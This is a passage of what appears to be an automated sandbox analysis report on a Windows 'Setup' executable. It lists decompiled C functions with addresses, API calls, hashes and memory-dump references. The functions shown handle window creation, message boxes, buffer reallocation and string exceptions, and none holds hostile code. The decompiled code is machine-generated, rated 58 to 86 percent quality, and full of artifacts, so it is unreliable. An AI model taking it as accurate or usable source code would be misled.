                                                                                                                                                              0x004f72b9
                                                                                                                                                              0x004f72bb
                                                                                                                                                              0x004f72be
                                                                                                                                                              0x004f72c2
                                                                                                                                                              0x004f72cc
                                                                                                                                                              0x004f72e4
                                                                                                                                                              0x004f72e9
                                                                                                                                                              0x004f72f8
                                                                                                                                                              0x004f7300
                                                                                                                                                              0x004f7302
                                                                                                                                                              0x004f73c1
                                                                                                                                                              0x004f73c8
                                                                                                                                                              0x004f73d2
                                                                                                                                                              0x004f73d7
                                                                                                                                                              0x004f7308
                                                                                                                                                              0x004f730c
                                                                                                                                                              0x004f7316
                                                                                                                                                              0x004f731a
                                                                                                                                                              0x004f7321
                                                                                                                                                              0x004f7323
                                                                                                                                                              0x004f7337
                                                                                                                                                              0x004f7337
                                                                                                                                                              0x004f7340
                                                                                                                                                              0x004f7342
                                                                                                                                                              0x004f734f
                                                                                                                                                              0x004f7344
                                                                                                                                                              0x004f734a
                                                                                                                                                              0x004f734a
                                                                                                                                                              0x004f736b
                                                                                                                                                              0x004f7371
                                                                                                                                                              0x004f7374
                                                                                                                                                              0x004f7378
                                                                                                                                                              0x004f737f
                                                                                                                                                              0x004f7384
                                                                                                                                                              0x004f738b
                                                                                                                                                              0x004f739e
                                                                                                                                                              0x004f73a6
                                                                                                                                                              0x004f73ad
                                                                                                                                                              0x004f73b7
                                                                                                                                                              0x004f73bc
                                                                                                                                                              0x004f73bc
                                                                                                                                                              0x004f72ce
                                                                                                                                                              0x004f72ce
                                                                                                                                                              0x004f72ce
                                                                                                                                                              0x004f73dd
                                                                                                                                                              0x004f73f2

                                                                                                                                                              APIs
                                                                                                                                                              • MessageBoxW.USER32(00000000,00000000,JSError,00000030), ref: 004F7337
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message
                                                                                                                                                              • String ID: JSError$JSError:
                                                                                                                                                              • API String ID: 2030045667-3168168555
                                                                                                                                                              • Opcode ID: e9f62c1a29abfb43f4d258fa65763e65ab643698d7a395236dd84a9f79b53bb8
                                                                                                                                                              • Instruction ID: cf006f8e730ff20441fb699ad4947263adb02b852262e9c3252fa3747a375cb8
                                                                                                                                                              • Opcode Fuzzy Hash: e9f62c1a29abfb43f4d258fa65763e65ab643698d7a395236dd84a9f79b53bb8
                                                                                                                                                              • Instruction Fuzzy Hash: 15416C70D1425CEBDB04DFE5DD41BEEB7B4AF10714F10812EE916AB281EB786A08CB58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004142F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E004142F0(struct HMENU__* __ecx, struct HWND__* _a4, char _a8, WCHAR* _a12, signed int _a16, long _a20, struct HMENU__* _a24, signed int _a28, void* _a32) {
				struct HWND__* _v8;
				intOrPtr _v12;
				struct HMENU__* _v16;
				struct HINSTANCE__* _t37;

				_v16 = __ecx;
				do {
				} while (0 != 0 || 0 != 0);
				_v12 = E00416FC0(_v16 + 8, 0, 0);
				if(_v12 != 0) {
					if((_a28 & 0x0000ffff) != 0) {
						E004142D0(0x5bc84c, _v16 + 8, _v16);
						if(_a24 == 0 && (_a16 & 0x40000000) != 0) {
							_a24 = _v16;
						}
						if(_a8 == 0) {
							_a8 = 0x563b60;
						}
						_t37 = E004150F0(0x5bc878);
						_t17 =  &_a8; // 0x563b60
						_t18 =  &_a8; // 0x563b60
						_t21 =  &_a8; // 0x563b60
						_t22 =  &_a8; // 0x563b60
						_t24 =  &_a8; // 0x563b60
						_t26 =  &_a8; // 0x563b60
						_v8 = CreateWindowExW(_a20, _a28 & 0x0000ffff, _a12, _a16,  *( *_t26),  *( *_t24 + 4),  *((intOrPtr*)( *_t21 + 8)) -  *((intOrPtr*)( *_t22)),  *((intOrPtr*)( *_t17 + 0xc)) -  *((intOrPtr*)( *_t18 + 4)), _a4, _a24, _t37, _a32);
						do {
						} while (0 != 0 || 0 != 0);
						return _v8;
					}
					return 0;
				}
				SetLastError(0xe);
				return 0;
			}







                                                                                                                                                              0x004142f6
                                                                                                                                                              0x004142f9
                                                                                                                                                              0x004142f9
                                                                                                                                                              0x00414310
                                                                                                                                                              0x00414317
                                                                                                                                                              0x0041432e
                                                                                                                                                              0x00414347
                                                                                                                                                              0x00414350
                                                                                                                                                              0x00414360
                                                                                                                                                              0x00414360
                                                                                                                                                              0x00414367
                                                                                                                                                              0x00414369
                                                                                                                                                              0x00414369
                                                                                                                                                              0x00414379
                                                                                                                                                              0x00414387
                                                                                                                                                              0x0041438a
                                                                                                                                                              0x00414394
                                                                                                                                                              0x00414397
                                                                                                                                                              0x004143a0
                                                                                                                                                              0x004143a7
                                                                                                                                                              0x004143c4
                                                                                                                                                              0x004143c7
                                                                                                                                                              0x004143c7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004143cf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00414330
                                                                                                                                                              0x0041431b
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(0000000E,00000000,00000000,?), ref: 0041431B
                                                                                                                                                              • CreateWindowExW.USER32 ref: 004143BE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorLastWindow
                                                                                                                                                              • String ID: `;V
                                                                                                                                                              • API String ID: 3732789607-153881035
                                                                                                                                                              • Opcode ID: bc5481094147c5028f869b2af17f56e0ed4df777ac421fbe60ea03ec0394619d
                                                                                                                                                              • Instruction ID: f4675ab21f95ec9b4676b29afb7d41b1f0b68bab34476891cf68291ecf48fe51
                                                                                                                                                              • Opcode Fuzzy Hash: bc5481094147c5028f869b2af17f56e0ed4df777ac421fbe60ea03ec0394619d
                                                                                                                                                              • Instruction Fuzzy Hash: F931E875600109ABCB04CFA9D890BEEB7B5FB98305F10C15AFD199B344D638E991CB68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00414570 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00414570(intOrPtr* __ecx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				void* _t85;
				void* _t86;

				_t86 = __esi;
				_t85 = __edi;
				_v20 = __ecx;
				if( *(_v20 + 4) !=  *(_v20 + 8)) {
					L17:
					_t38 =  &_a4; // 0x412f7d
					E004144E0(_v20,  *(_v20 + 4),  *_t38);
					 *(_v20 + 4) =  *(_v20 + 4) + 1;
					return 1;
				} else {
					goto L1;
				}
				do {
					L1:
					_t7 =  &_a4; // 0x412f7d
					if( *_t7 <  *_v20 || _a4 >=  *_v20 +  *(_v20 + 8) * 2) {
						_v24 = 1;
					} else {
						_v24 = 0;
					}
					_v16 = _v24;
					if(_v16 == 0) {
						E00417470(0x80004005);
					}
				} while (0 != 0);
				if( *(_v20 + 8) != 0) {
					_v28 =  *(_v20 + 4) << 1;
				} else {
					_v28 = 1;
				}
				_v12 = _v28;
				if(_v12 < 0 || _v12 > 0x3fffffff) {
					return 0;
				} else {
					_v8 = E00451CF3(_t85, _t86,  *_v20, _v12, 2);
					if(_v8 != 0) {
						 *(_v20 + 8) = _v12;
						 *_v20 = _v8;
						goto L17;
					}
					return 0;
				}
			}











                                                                                                                                                              0x00414570
                                                                                                                                                              0x00414570
                                                                                                                                                              0x00414576
                                                                                                                                                              0x00414585
                                                                                                                                                              0x0041463a
                                                                                                                                                              0x0041463a
                                                                                                                                                              0x00414648
                                                                                                                                                              0x00414659
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041458b
                                                                                                                                                              0x0041458b
                                                                                                                                                              0x0041458e
                                                                                                                                                              0x00414593
                                                                                                                                                              0x004145b1
                                                                                                                                                              0x004145a8
                                                                                                                                                              0x004145a8
                                                                                                                                                              0x004145a8
                                                                                                                                                              0x004145bb
                                                                                                                                                              0x004145c2
                                                                                                                                                              0x004145c9
                                                                                                                                                              0x004145c9
                                                                                                                                                              0x004145ce
                                                                                                                                                              0x004145d9
                                                                                                                                                              0x004145ec
                                                                                                                                                              0x004145db
                                                                                                                                                              0x004145db
                                                                                                                                                              0x004145db
                                                                                                                                                              0x004145f2
                                                                                                                                                              0x004145f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00414608
                                                                                                                                                              0x0041461c
                                                                                                                                                              0x00414623
                                                                                                                                                              0x0041462f
                                                                                                                                                              0x00414638
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00414638
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00414625

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __recalloc
                                                                                                                                                              • String ID: }/A$}/A
                                                                                                                                                              • API String ID: 492097735-3808699022
                                                                                                                                                              • Opcode ID: ed2bd2c41bf67b89da7877967f424ab82685def55af695b61b3782420c1fa0cc
                                                                                                                                                              • Instruction ID: 24197290a2c52d798ca412b7abbdb8b798166c6d33e6234649ae13cb00557ef3
                                                                                                                                                              • Opcode Fuzzy Hash: ed2bd2c41bf67b89da7877967f424ab82685def55af695b61b3782420c1fa0cc
                                                                                                                                                              • Instruction Fuzzy Hash: 9031EAB4A00219EFCB04DF94C580AEEB7B2FF89308F20855AD915AB351D739AD81CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F16B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E004F16B0(intOrPtr __ecx) {
				int _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v25;
				char _v32;
				char _v33;
				intOrPtr _v40;
				signed int _t28;
				void* _t39;
				void* _t41;
				struct HWND__* _t44;
				intOrPtr _t48;
				signed int _t71;

				_push(0xffffffff);
				_push(0x50c858);
				_push( *[fs:0x0]);
				_t28 =  *0x561244; // 0xddd124f9
				_push(_t28 ^ _t71);
				 *[fs:0x0] =  &_v16;
				_v40 = __ecx;
				E00414C90();
				_v8 = 0;
				if((E004F06E0(_v40, L"setupProgress", E00434050( &_v24)) & 0x000000ff) != 0) {
					E00414C90();
					_v8 = 1;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v40 + 0x5c))))))(_v40 + 0x5c, E00434050( &_v20));
					_t39 = E0041D530( &_v20);
					__eflags = _v40 + 0x84;
					_t41 = E0041D530(E00416210(_v40 + 0x84,  &_v32));
					E004E6ED0(E004049B0(), __eflags, _t41, _t39);
					_t44 =  *0x5bdd34; // 0x80078
					PostMessageW(_t44, 0x402, 0, 0);
					_v33 = 1;
					_v8 = 0;
					E0040D320();
					_v8 = 0xffffffff;
					E0040D320();
					_t48 = _v33;
				} else {
					_v25 = 0;
					_v8 = 0xffffffff;
					E0040D320();
					_t48 = _v25;
				}
				 *[fs:0x0] = _v16;
				return _t48;
			}

















                                                                                                                                                              0x004f16b3
                                                                                                                                                              0x004f16b5
                                                                                                                                                              0x004f16c0
                                                                                                                                                              0x004f16c4
                                                                                                                                                              0x004f16cb
                                                                                                                                                              0x004f16cf
                                                                                                                                                              0x004f16d5
                                                                                                                                                              0x004f16db
                                                                                                                                                              0x004f16e0
                                                                                                                                                              0x004f1702
                                                                                                                                                              0x004f1722
                                                                                                                                                              0x004f1727
                                                                                                                                                              0x004f1743
                                                                                                                                                              0x004f1748
                                                                                                                                                              0x004f1755
                                                                                                                                                              0x004f1762
                                                                                                                                                              0x004f176f
                                                                                                                                                              0x004f177d
                                                                                                                                                              0x004f1783
                                                                                                                                                              0x004f1789
                                                                                                                                                              0x004f178d
                                                                                                                                                              0x004f1794
                                                                                                                                                              0x004f1799
                                                                                                                                                              0x004f17a3
                                                                                                                                                              0x004f17a8
                                                                                                                                                              0x004f1704
                                                                                                                                                              0x004f1704
                                                                                                                                                              0x004f1708
                                                                                                                                                              0x004f1712
                                                                                                                                                              0x004f1717
                                                                                                                                                              0x004f1717
                                                                                                                                                              0x004f17ae
                                                                                                                                                              0x004f17b9

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F1768
                                                                                                                                                              • PostMessageW.USER32(00080078,00000402,00000000,00000000), ref: 004F1783
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ImmortalizeMessagePost
                                                                                                                                                              • String ID: setupProgress
                                                                                                                                                              • API String ID: 2625385972-2832641745
                                                                                                                                                              • Opcode ID: 3416b2c64cff4d0a2fdd0e3e7097e33905e81d981fb11a63ee0862c9b060d800
                                                                                                                                                              • Instruction ID: 5efc7772feee3f8601489b69cf35665293bf3e2b9feb4c2702f4ee32e789bbc5
                                                                                                                                                              • Opcode Fuzzy Hash: 3416b2c64cff4d0a2fdd0e3e7097e33905e81d981fb11a63ee0862c9b060d800
                                                                                                                                                              • Instruction Fuzzy Hash: 4D319170D00249ABCB08EFE5D952BFEB7B4AF14314F10419EE512772D1DB782A08CBA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040D250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0040D250(intOrPtr __ebx, intOrPtr __ecx, WCHAR* __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				short _v24;
				char _v28;
				intOrPtr _v32;
				signed int _t8;
				signed int _t14;
				intOrPtr _t18;
				intOrPtr _t26;
				intOrPtr _t27;
				signed int _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t18 = __ebx;
				_t8 =  *0x561244; // 0xddd124f9
				_v8 = _t8 ^ _t28;
				_v32 = __ecx;
				if(GetClassNameW(E0041D530(E00416210(_v32,  &_v28)),  &_v24, 8) != 0) {
					_t25 =  &_v24;
					_t14 = lstrcmpW( &_v24, L"#32770");
					asm("sbb eax, eax");
					_t16 =  ~_t14 + 1;
				} else {
					_t16 = 0;
				}
				return E0044F6C8(_t16, _t18, _v8 ^ _t28, _t25, _t26, _t27);
			}













                                                                                                                                                              0x0040d250
                                                                                                                                                              0x0040d250
                                                                                                                                                              0x0040d250
                                                                                                                                                              0x0040d250
                                                                                                                                                              0x0040d256
                                                                                                                                                              0x0040d25d
                                                                                                                                                              0x0040d260
                                                                                                                                                              0x0040d285
                                                                                                                                                              0x0040d290
                                                                                                                                                              0x0040d294
                                                                                                                                                              0x0040d29c
                                                                                                                                                              0x0040d29e
                                                                                                                                                              0x0040d287
                                                                                                                                                              0x0040d287
                                                                                                                                                              0x0040d287
                                                                                                                                                              0x0040d2ae

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00416210: GetParent.USER32(-00000084), ref: 0041621D
                                                                                                                                                              • GetClassNameW.USER32 ref: 0040D27D
                                                                                                                                                              • lstrcmpW.KERNEL32(?,#32770), ref: 0040D294
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassNameParentlstrcmp
                                                                                                                                                              • String ID: #32770
                                                                                                                                                              • API String ID: 3513268407-463685578
                                                                                                                                                              • Opcode ID: e2890b091a2eff4d2f0aae01bf3e70ddc12ed54ec836df256570ebb502a240df
                                                                                                                                                              • Instruction ID: 1690f334c6585ecb6f88071bad41f21d97651b8226febb9f9509e1ae735e5502
                                                                                                                                                              • Opcode Fuzzy Hash: e2890b091a2eff4d2f0aae01bf3e70ddc12ed54ec836df256570ebb502a240df
                                                                                                                                                              • Instruction Fuzzy Hash: 4BF09030E00209ABDB00EFF5D9469FE77B8AB14304B50496EA406E7280FA38A9099B55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0044F642 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E0044F642(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				char _v20;
				char _v40;
				char _v80;
				void* _t37;
				signed int _t38;
				intOrPtr* _t42;
				void* _t55;
				void* _t59;
				void* _t61;

				_t56 = __edi;
				_t45 = __ebx;
				_push(0x44);
				E00456E7E(0x505398, __ebx, __edi, __esi);
				E004134D0( &_v40, "string too long");
				_v4 = _v4 & 0x00000000;
				E00413D50( &_v40);
				E00456A4C( &_v80, 0x544b50);
				asm("int3");
				_push(0x44);
				E00456E7E(0x505398, __ebx, __edi, __esi);
				E004134D0( &_v40, "invalid string position");
				_v4 = _v4 & 0x00000000;
				E00413210( &_v40);
				E00456A4C( &_v80, 0x544adc);
				asm("int3");
				_t61 = _t59;
				_push(_t61);
				while(1) {
					_t37 = E0044FBD9(_t45, _t55, _t56, _v0); // executed
					if(_t37 != 0) {
						break;
					}
					_t38 = E00456FFC(_v0);
					__eflags = _t38;
					if(_t38 == 0) {
						__eflags =  *0x5bc914 & 0x00000001;
						if(( *0x5bc914 & 0x00000001) == 0) {
							 *0x5bc914 =  *0x5bc914 | 0x00000001;
							__eflags =  *0x5bc914;
							E0044F754(0x5bc908);
							E0044FAE5( *0x5bc914, 0x51a041);
						}
						E00417C20(0x5bc908);
						E00456A4C( &_v20, 0x544b88);
						asm("int3");
						_t42 =  &_v20;
						 *(_t42 + 4) =  *(_t42 + 4) & 0x00000000;
						_t21 = _t42 + 8;
						 *_t21 =  *(_t42 + 8) & 0x00000000;
						__eflags =  *_t21;
						 *_t42 = 0x51bc00;
						return _t42;
					} else {
						continue;
					}
					L11:
				}
				return _t37;
				goto L11;
			}














                                                                                                                                                              0x0044f642
                                                                                                                                                              0x0044f642
                                                                                                                                                              0x0044f642
                                                                                                                                                              0x0044f649
                                                                                                                                                              0x0044f656
                                                                                                                                                              0x0044f65b
                                                                                                                                                              0x0044f666
                                                                                                                                                              0x0044f674
                                                                                                                                                              0x0044f679
                                                                                                                                                              0x0044f67a
                                                                                                                                                              0x0044f681
                                                                                                                                                              0x0044f68e
                                                                                                                                                              0x0044f693
                                                                                                                                                              0x0044f69e
                                                                                                                                                              0x0044f6ac
                                                                                                                                                              0x0044f6b1
                                                                                                                                                              0x0044f6b7
                                                                                                                                                              0x0044f771
                                                                                                                                                              0x0044f786
                                                                                                                                                              0x0044f789
                                                                                                                                                              0x0044f791
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f77c
                                                                                                                                                              0x0044f782
                                                                                                                                                              0x0044f784
                                                                                                                                                              0x0044f795
                                                                                                                                                              0x0044f7a1
                                                                                                                                                              0x0044f7a3
                                                                                                                                                              0x0044f7a3
                                                                                                                                                              0x0044f7ac
                                                                                                                                                              0x0044f7b6
                                                                                                                                                              0x0044f7bb
                                                                                                                                                              0x0044f7c0
                                                                                                                                                              0x0044f7ce
                                                                                                                                                              0x0044f7d3
                                                                                                                                                              0x0044f7d4
                                                                                                                                                              0x0044f7d6
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7de
                                                                                                                                                              0x0044f7e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f784
                                                                                                                                                              0x0044f794
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0044F649
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0044F674
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                                              • String ID: string too long
                                                                                                                                                              • API String ID: 1961742612-2556327735
                                                                                                                                                              • Opcode ID: 0d2da4726461649e821c7cc043b2f499f67cff6a2130653a1fe2c0e11d901b1d
                                                                                                                                                              • Instruction ID: 67ae62e1f2c81d8f8597e4a67a4f88d5809dd61757c1dccfe68e006e076641f1
                                                                                                                                                              • Opcode Fuzzy Hash: 0d2da4726461649e821c7cc043b2f499f67cff6a2130653a1fe2c0e11d901b1d
                                                                                                                                                              • Instruction Fuzzy Hash: 93D0127195020897DB04EAD1CC52BDDB778BB1431EF40041AA60177086DBBC5648CB28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0044F67A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0044F67A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				char _v20;
				char _v40;
				char _v80;
				void* _t24;
				signed int _t25;
				intOrPtr* _t29;
				void* _t40;
				void* _t44;
				void* _t46;

				_t41 = __edi;
				_t32 = __ebx;
				_push(0x44);
				E00456E7E(0x505398, __ebx, __edi, __esi);
				E004134D0( &_v40, "invalid string position");
				_v4 = _v4 & 0x00000000;
				E00413210( &_v40);
				E00456A4C( &_v80, 0x544adc);
				asm("int3");
				_t46 = _t44;
				_push(_t46);
				while(1) {
					_t24 = E0044FBD9(_t32, _t40, _t41, _v0); // executed
					if(_t24 != 0) {
						break;
					}
					_t25 = E00456FFC(_v0);
					__eflags = _t25;
					if(_t25 == 0) {
						__eflags =  *0x5bc914 & 0x00000001;
						if(( *0x5bc914 & 0x00000001) == 0) {
							 *0x5bc914 =  *0x5bc914 | 0x00000001;
							__eflags =  *0x5bc914;
							E0044F754(0x5bc908);
							E0044FAE5( *0x5bc914, 0x51a041);
						}
						E00417C20(0x5bc908);
						E00456A4C( &_v20, 0x544b88);
						asm("int3");
						_t29 =  &_v20;
						 *(_t29 + 4) =  *(_t29 + 4) & 0x00000000;
						_t15 = _t29 + 8;
						 *_t15 =  *(_t29 + 8) & 0x00000000;
						__eflags =  *_t15;
						 *_t29 = 0x51bc00;
						return _t29;
					} else {
						continue;
					}
					L10:
				}
				return _t24;
				goto L10;
			}














